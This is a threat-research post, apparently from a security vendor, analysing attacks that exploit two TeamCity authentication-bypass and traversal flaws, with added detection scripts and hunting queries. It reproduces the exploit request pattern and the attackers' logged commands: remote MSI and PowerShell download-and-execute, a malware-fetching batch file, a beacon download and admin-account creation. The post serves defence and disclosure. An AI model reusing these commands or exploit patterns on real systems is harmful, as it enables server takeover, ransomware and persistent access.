TeamCity Vulnerability Exploits Lead to Jasmin Ransomware, Other Malware Types

CVE-2024-27198 and CVE-2024-27199 are vulnerabilities within the TeamCity On-Premises platform that can allow attackers to gain administrative control over affected systems.

 

On March 4, 2024, JetBrains disclosed two critical vulnerabilities — CVE-2024-27198 and CVE-2024-27199 — within the TeamCity On-Premises platform that allow attackers to bypass authentication measures and gain administrative control over affected servers.

Threat actors can exploit CVE-2024-27198 to perform a variety of malicious operations (which will be discussed in separate subsections), including:

  • Dropping the Jasmin ransomware
  • Deploying the XMRig cryptocurrency miner
  • Deploying Cobalt Strike beacons
  • Deploying the SparkRAT backdoor
  • Executing domain discovery and persistence commands

Public proof-of-concept (POC) exploits for these vulnerabilities already exist, heightening the risk of widespread exploitation. Given the active exploitation we’ve observed via our telemetry, it’s essential for organizations to promptly address these vulnerabilities to safeguard their data and systems. Customers of TeamCity with servers affected by these vulnerabilities are advised to update their software as soon as possible. The US Cybersecurity and Infrastructure Security Agency (CISA) has also added CVE-2024-27198 to its Known Exploited Vulnerabilities catalog. Trend Micro customers are protected from this vulnerability via the solutions listed at the end of this blog entry.

Description of vulnerabilities

Rapid7 published an analysis of the two vulnerabilities in the JetBrains TeamCity continuous integration and continuous deployment (CI/CD) server. Both are currently being exploited in the wild, with numerous proofs of concept proliferating on GitHub and social media.

CVE-2024-27198: JetBrains TeamCity authentication bypass vulnerability

CVE-2024-27198 is an authentication bypass vulnerability (with a Critical CVSS score of 9.8) in the web component of TeamCity that contains an alternative path issue (CWE-288). This vulnerability can be exploited by an unauthenticated attacker to achieve remote code execution (RCE).


Figure 1. An example of network traffic exploiting CVE-2024-27198

To exploit CVE-2024-27198, an attacker must meet the following conditions:

  • Generate an unauthenticated 404 HTTP Response.
  • Pass the HTTP query string “?jsp=/app/rest/server”.
  • Append “;.jsp” to the HTTP path parameter.

CVE-2024-27199: JetBrains TeamCity directory traversal vulnerability

CVE-2024-27199 is a directory traversal vulnerability (CWE-22) in the web component of TeamCity with a High CVSS score of 7.3 that can lead to authentication bypass. An attacker can leverage this vulnerability to leak sensitive information and modify a limited number of TeamCity system settings.


Figure 2. An example of network traffic exploiting CVE-2024-27199

Several TeamCity paths are vulnerable to a directory traversal, including:

  • /res/
  • /update/
  • /.well-known/acme-challenge/
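As an added example (not part of the original post or of Trend Micro's tooling), the following Python routine applies the two request patterns described above to web-server access log lines: the ";.jsp" path suffix combined with a jsp= query pointing into /app/rest/ for CVE-2024-27198, and ".." traversal under the three listed prefixes for CVE-2024-27199. The log lines, client addresses (RFC 5737 ranges) and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined/common log format: client, ident, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Path prefixes the post lists as affected by the CVE-2024-27199 traversal
TRAVERSAL_PREFIXES = ("/res/", "/update/", "/.well-known/acme-challenge/")


def classify_request(target):
    """Return the CVE id the request target matches, or None."""
    parts = urlsplit(target)            # urlsplit keeps ';...' inside the path
    path = unquote(parts.path)          # decode %2e%2e / %2f style encodings first
    query = parse_qs(parts.query)
    # CVE-2024-27198: ';.jsp' appended to the path plus a jsp= parameter into /app/rest/
    if ";.jsp" in path and any(v.startswith("/app/rest/") for v in query.get("jsp", [])):
        return "CVE-2024-27198"
    # CVE-2024-27199: a '..' segment under one of the traversal-prone prefixes
    if path.startswith(TRAVERSAL_PREFIXES) and ".." in path.split("/"):
        return "CVE-2024-27199"
    return None


def scan_access_log(lines):
    """Return (client_ip, cve, target) for every log line matching either pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue                    # not a parsable access-log line
        cve = classify_request(m.group("target"))
        if cve:
            hits.append((m.group("ip"), cve, m.group("target")))
    return hits


# Constructed sample lines; the request shapes follow the conditions listed above
SAMPLE_LOG = [
    '203.0.113.10 - - [05/Mar/2024:10:12:01 +0000] "GET /hax;.jsp?jsp=/app/rest/server HTTP/1.1" 200 812',
    '203.0.113.10 - - [05/Mar/2024:10:12:05 +0000] "GET /res/..%2Fapp/rest/server HTTP/1.1" 200 812',
    '198.51.100.7 - - [05/Mar/2024:10:13:00 +0000] "GET /app/rest/server HTTP/1.1" 401 0',
    '198.51.100.7 - - [05/Mar/2024:10:13:02 +0000] "GET /res/img/logo.png HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for ip, cve, target in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {cve} {target}")
```

Matching on the request shape rather than on the 404 status keeps the check useful on logs that only record the final (200) response of a successful bypass.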

Post-Exploitation payloads

Within the same timeframe as the disclosure of the TeamCity vulnerabilities, several proofs of concept were also made publicly available. Upon their publication, we observed instances of threat actors exploiting these vulnerabilities.

Figure 3. Attack diagram

Threat actors might exploit CVE-2024-27198 or CVE-2024-27199 to bypass authentication on vulnerable On-Premises TeamCity servers and issue follow-on commands. They are then able to achieve RCE through TeamCity-related processes, such as spawning a command and scripting interpreter (including PowerShell) to download additional malware or perform discovery commands. The attackers are then able to install malware that reaches out to its command-and-control (C&C) server and performs additional commands, such as deploying Cobalt Strike beacons and remote access trojans (RATs). Ransomware can then be installed as a final payload to encrypt files and demand ransom payments from victims.

Exploits that drop Jasmin ransomware

One of the earliest threat actors that we found exploiting these vulnerabilities deployed a variant of the open-source Jasmin ransomware during the post-exploitation phase.

We observed the following process tree via our telemetry:

Parent Process:
C:\TeamCity\jre\bin\java.exe
Subject Process:
C:\Windows\System32\cmd.exe /c "msiexec /q /i hxxp://207[.]246[.]102[.]242:56641/ABC[.]msi"

This process will download an MSI file (SHA256: 56942b36d5990f66a81955a94511298fd27cb6092e467110a7995a0654f17b1a) that will drop and execute a PE file (SHA256: 32a630decb8fcc8a7ed4811f4293b9d5a242ce7865ab10c19a16fc4aa384bf64).

The ransomware has the ability to rename files with the extension .lsoc and drop a ransom note with the file name un-lock your files.html.

Figure 4. Files renamed by the Jasmin ransomware use the extension .lsoc

Figure 5. Ransom note dropped by the Jasmin ransomware

Upon checking the ransom note’s source code, we discovered that it was obfuscated and used JavaScript to generate the ransom note text, likely to evade detection from security products and ensure that victims will see and read the ransom note file.


Figure 6. The Jasmin ransom note source code

Deploying the XMRig cryptocurrency miner

We also found threat actors that were deploying a variant of the open-source XMRig cryptocurrency-mining malware to vulnerable TeamCity servers. Similar cryptominers were also deployed in January 2024 after Ivanti Connect Secure VPN exploitation activities. The following is the cryptominer installation as seen from our telemetry:

Parent Process:

C:\TeamCity\jre\bin\java.exe

Subject Process:

C:\Windows\System32\cmd.exe /c "msiexec /q /i hxxp://146[.]70[.]149[.]185:58090/JavaAccessBridge-64.msi"

The downloaded MSI file (SHA256: 7cbe0c55b3ca5d12be640e519e4399469399b3eaada20705342fa681befe8c7b) will drop, decrypt, and execute the main XMRig file named JavaAccessBridge-64.exe (SHA256: 01db4578f5fb7b29800f7b07a31fda7ff812309f62f7148fca0e246279f6ca61) alongside its two component files, config.json and WinRing0x64.sys, in the C:\Users\Public\Videos directory.

Figure 7. The coinminer component files dropped in the "C:\Users\Public\Videos" directory

The malware uses the vulnerable driver WinRing0x64.sys to access the model-specific register (MSR) to perform its mining routines when other methods fail.

Figure 8. The malware attempts to create a service for the WinRing0 driver

The miner is configured to run using the following config file (saved in the config.json file):

Figure 9. A snippet of the config file

Figure 10. Screenshot of the XMRig console

This miner was installed using multiple stages of batch files and living-off-the-land binary (LOLBin) tools such as certutil.exe. Figure 11 shows the process tree and the executed commands as seen from Trend Micro Vision One™ telemetry. 

Figure 11. The miner process tree as seen from Trend Vision One

Deploying the SparkRAT backdoor

Meanwhile, another threat actor deployed a variant of the open-source Golang-based SparkRAT backdoor. We observed the executable binary java.exe under the TeamCity directory deploying a PowerShell command to download and execute a batch file named win.bat:

Parent Process:

C:\TeamCity\jre\bin\java.exe

Subject Process:

C:\Windows\System32\cmd.exe /c "powershell -ep bypass IEX (New-Object System.Net.Webclient).DownloadFile('hxxp://38[.]54[.]94[.]13:8080/win.bat','c:\users\public\win.bat');start-process 'c:\users\public\win.bat'"

The contents of the downloaded win.bat file are as follows:

@echo off
cmd /c certutil -urlcache -split -f hxxp://38[.]54[.]94[.]13:8080/86.dat c:\users\public\public.dat
cmd /c start /b c:\users\public\public.dat
sc create windowDefenSrv binPath= "cmd /c start /b c:\users\public\public.dat windowDefenSrv" start= auto
del c:\users\public\win.bat

This batch file will download and execute the SparkRAT malware (SHA256: 908b30abf730a5b51a3d25965eff45a639e881a97505220a38591fe326e00697) by abusing certutil, after which it will delete the original win.bat. The C&C server of this piece of malware is 38[.]54[.]94[.]13.

Figure 12 shows a snippet of the SparkRAT functions that were found inside the downloaded backdoor and are consistent with the code from the open-source repository https://github.com/XZB-1248/Spark.

Similar to the cryptocurrency miner installation, the threat actors deploying SparkRAT also used a variety of batch files and LOLBins to perform a multistage attack. Figure 13 shows the process tree and the executed commands as seen from the Trend Vision One XDR telemetry.

Figure 12. SparkRAT process tree and executed commands

Executing domain discovery and persistence commands

Aside from malware deployment, we have also seen several attempts to discover network infrastructure and employ persistence commands arising from the java.exe process under a vulnerable TeamCity server directory.

Parent Process:
C:\TeamCity\jre\bin\java.exe

We observed the following subject processes being used for discovery and persistence tactics:

  • C:\WINDOWS\system32\net.exe group /domain
  • C:\WINDOWS\system32\net1.exe localgroup Administratoren /add Default$
  • C:\WINDOWS\system32\net1.exe localgroup Administrators /add Default$
  • C:\WINDOWS\system32\net1.exe user /add Default$ GH{redacted}23gwg
  • C:\WINDOWS\system32\net1.exe user /del defaultuser0
  • C:\WINDOWS\system32\net1.exe user /domain
  • C:\WINDOWS\system32\net1.exe user administrator
  • C:\WINDOWS\system32\net1.exe user default$
  • C:\WINDOWS\system32\nltest.exe /domain_trusts

Several of these commands involve attempts to manipulate user accounts, groups, and permissions, which are typical actions taken by attackers seeking to gain unauthorized access to a system. The attempt to add a user to the local Administrators group is particularly concerning, since it could grant elevated privileges to attackers and help them establish a foothold in the system that can be used to maintain access over an extended period.
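The process trees in this and the preceding sections share one shape: TeamCity's java.exe spawning a command interpreter or a LOLBin. The following Python triage routine is added here as an illustration (it is not Trend Micro's or JetBrains' code): it flags that parent/child relationship on endpoint process-creation events and raises the severity for the account-manipulation and remote-MSI command lines shown above. The event structure, sample events and the address in the URL are constructed.

```python
import re
from collections import namedtuple

# One endpoint process-creation event: parent image path plus the child's full command line
ProcEvent = namedtuple("ProcEvent", "parent_path child_cmd")
# Interpreters and LOLBins seen spawned by TeamCity's java.exe in the cases above
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "net.exe", "net1.exe",
                       "nltest.exe", "msiexec.exe", "certutil.exe", "curl.exe"}
# Command-line patterns that raise a finding to high severity; first match wins
HIGH_SEVERITY = [
    (re.compile(r"\blocalgroup\s+administrat\w*\s+/add\b", re.I), "local admin group modification"),
    (re.compile(r"\buser\s+/add\b", re.I), "local account creation"),
    (re.compile(r"\bmsiexec\b.*\s/i\s+\S+://", re.I), "MSI install from remote URL"),
]

def is_teamcity_java(parent_path):
    """True when the parent is java.exe running from a TeamCity install directory."""
    p = parent_path.lower().replace("/", "\\")
    return "\\teamcity\\" in p and p.endswith("\\java.exe")

def child_image(cmd):
    """Image file name of the child, taken from the first token of its command line."""
    token = cmd.strip().split()[0].strip('"')   # fine for the unquoted system32 paths seen above
    return token.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def triage(events):
    """Return (severity, reason, child_cmd) for each interpreter/LOLBin child of TeamCity java.exe."""
    findings = []
    for ev in events:
        if not is_teamcity_java(ev.parent_path):
            continue
        image = child_image(ev.child_cmd)
        if image not in SUSPICIOUS_CHILDREN:
            continue
        sev, reason = "medium", f"{image} spawned by TeamCity java.exe"
        for pat, label in HIGH_SEVERITY:
            if pat.search(ev.child_cmd):
                sev, reason = "high", label
                break
        findings.append((sev, reason, ev.child_cmd))
    return findings

# Constructed events modelled on the process trees above (RFC 5737 address in the URL)
SAMPLE_EVENTS = [
    ProcEvent(r"C:\TeamCity\jre\bin\java.exe",
              r'C:\Windows\System32\cmd.exe /c "msiexec /q /i hxxp://203.0.113.5:56641/ABC.msi"'),
    ProcEvent(r"C:\TeamCity\jre\bin\java.exe", r"C:\WINDOWS\system32\net1.exe localgroup Administrators /add Default$"),
    ProcEvent(r"C:\TeamCity\jre\bin\java.exe", r"C:\WINDOWS\system32\nltest.exe /domain_trusts"),
    ProcEvent(r"C:\Program Files\Java\bin\java.exe", r"C:\Windows\System32\cmd.exe /c dir"),  # not TeamCity
]
```

Running triage(SAMPLE_EVENTS) yields two high-severity findings (the remote MSI install and the Administrators group change) and one medium finding for nltest.exe; the non-TeamCity java.exe event is ignored.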

Deploying Cobalt Strike beacons

Finally, we found threat actors deploying Cobeacon to vulnerable TeamCity servers. In one of the environments with a vulnerable TeamCity server, we found that a beacon (SHA1: db6bd96b152314db3c430df41b83fcf2e5712281) was deployed.

The beacon was downloaded using the command curl hxxp://83[.]97[.]20[.]141:81/beacon.out -o .conf and was saved in the path C:\TeamCity\bin\.conf.

This was detected by the Trend Pattern Backdoor.Linux.COBEACON.SMYXDKV. The beacon reaches out to the C&C server 83[.]97[.]20[.]141, which we have already proactively detected as of this writing.

Conclusion

The active exploitation of vulnerabilities within TeamCity On-Premises represents a critical threat to organizations relying on this platform for their CI/CD processes. Our telemetry has revealed that threat actors are exploiting these vulnerabilities to deploy ransomware, coinminers, and backdoor payloads on compromised TeamCity servers.

This malicious activity not only jeopardizes the confidentiality, integrity, and availability of sensitive data and critical systems but also imposes financial and operational risks for affected organizations. Swift action is imperative to mitigate these vulnerabilities and prevent further damage from ransomware extortion and other types of malware.

Trend Solutions

The following protections exist to detect malicious activity and shield Trend customers against the exploitation of the TeamCity On-Premises vulnerabilities discussed in this entry.

Trend Cloud One™ – Network Security and TippingPoint™ Filters

  • 43957 – HTTP: JetBrains TeamCity Directory Traversal Vulnerability
  • 43958 – HTTP: JetBrains TeamCity Authentication Bypass Vulnerability

Trend Vision One Network Sensor and Trend Micro™ Deep Discovery™ Inspector (DDI) Rules

  • 5011 – CVE-2024-27198 – JetBrains TeamCity Auth Bypass Exploit – HTTP (Response)
  • 5012 – CVE-2024-27199 – JetBrains TeamCity Directory Traversal Exploit – HTTP (Response)

Trend Vision One Endpoint Security, Trend Cloud One – Workload and Endpoint Security, Trend Micro™ Deep Security™ Software, and Vulnerability Protection IPS Rules

  • 1011995 – JetBrains TeamCity Authentication Bypass Vulnerability (CVE-2024-21798)
  • 1011996 – JetBrains TeamCity Directory Traversal Vulnerability (CVE-2024-21799)

Trend Vision One Queries

  • Jasmin ransomware file encryption event:
    eventSubId:101 AND processFilePath:abc.exe AND objectFilePath:.lsoc
  • Service installation of the Monero miner’s dropped kernel driver as seen from the registry:
    eventSubId:402 and tags:XSAE.F7460 and objectRegistryData:WinRing0x64.sys
  • Decoding of encrypted components dropped by the Monero miner MSI package through certutil.exe:
    eventSubId:2 and processCmd:IndexStore.bat and objectCmd:("certutil" and "decode")
  • Execution of the SparkRAT malware from the batch file:
    eventSubId:2 and processFilePath:cmd.exe and processCmd:win.bat and objectCmd:windowDefenSrv
  • Detection of suspicious process invocations from a TeamCity process:
    eventSubId:2 AND processCmd:TeamCity AND objectCmd:("powershell" OR "net" OR "nltest" OR "msiexec")

MITRE ATT&CK Matrix

  • Initial Access – Exploit Public-Facing Application (T1190)
  • Execution – PowerShell (T1059.001)
  • Defense Evasion – De-obfuscate/Decode Files or Information (T1140)
  • Discovery – Account Discovery (T1087)
  • Discovery – Domain Trust Discovery (T1482)
  • Command and Control – Ingress Tool Transfer (T1105)
  • Exfiltration – Exfiltration Over C2 Channel (T1041)
  • Impact – Data Encrypted for Impact (T1486)

Indicators of Compromise

The indicators of compromise for this entry can be found here.

Source: https://www.trendmicro.com/en_us/research/24/c/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware.html